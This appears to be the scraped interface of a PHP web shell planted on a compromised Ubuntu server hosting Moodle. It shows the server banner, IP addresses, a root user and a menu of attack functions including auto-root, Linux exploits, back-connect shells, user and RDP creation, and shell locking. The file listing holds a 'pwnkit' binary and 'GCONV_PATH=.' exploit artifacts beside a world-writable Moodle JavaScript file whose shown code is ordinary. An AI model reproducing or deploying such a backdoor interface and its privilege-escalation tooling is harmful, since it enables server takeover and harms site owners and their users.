Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
grade /
grading /
yui /
manage /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
manage.js
1.38
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : manage.js
/** * YUI module for advanced grading methods - the manage page * * @author David Mudrak <david@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ YUI.add('moodle-core_grading-manage', function(Y) { var MANAGE = function() { MANAGE.superclass.constructor.apply(this, arguments); } Y.extend(MANAGE, Y.Base, { initializer : function(config) { this.setup_messagebox(); }, setup_messagebox : function() { Y.one('#actionresultmessagebox span').setContent(M.util.get_string('clicktoclose', 'core_grading')); Y.one('#actionresultmessagebox').on('click', function(e) { e.halt(); var box = e.currentTarget; var anim = new Y.Anim({ node: box, duration: 1, to: { opacity: 0, height: 0 }, }); anim.run(); anim.on('end', function() { var box = this.get('node'); // this === anim box.remove(true); }); }); } }, { NAME : 'grading_manage_page', ATTRS : { } }); M.core_grading = M.core_grading || {}; M.core_grading.init_manage = function(config) { return new MANAGE(config); } }, '@VERSION@', { requires:['base', 'anim'] });
Close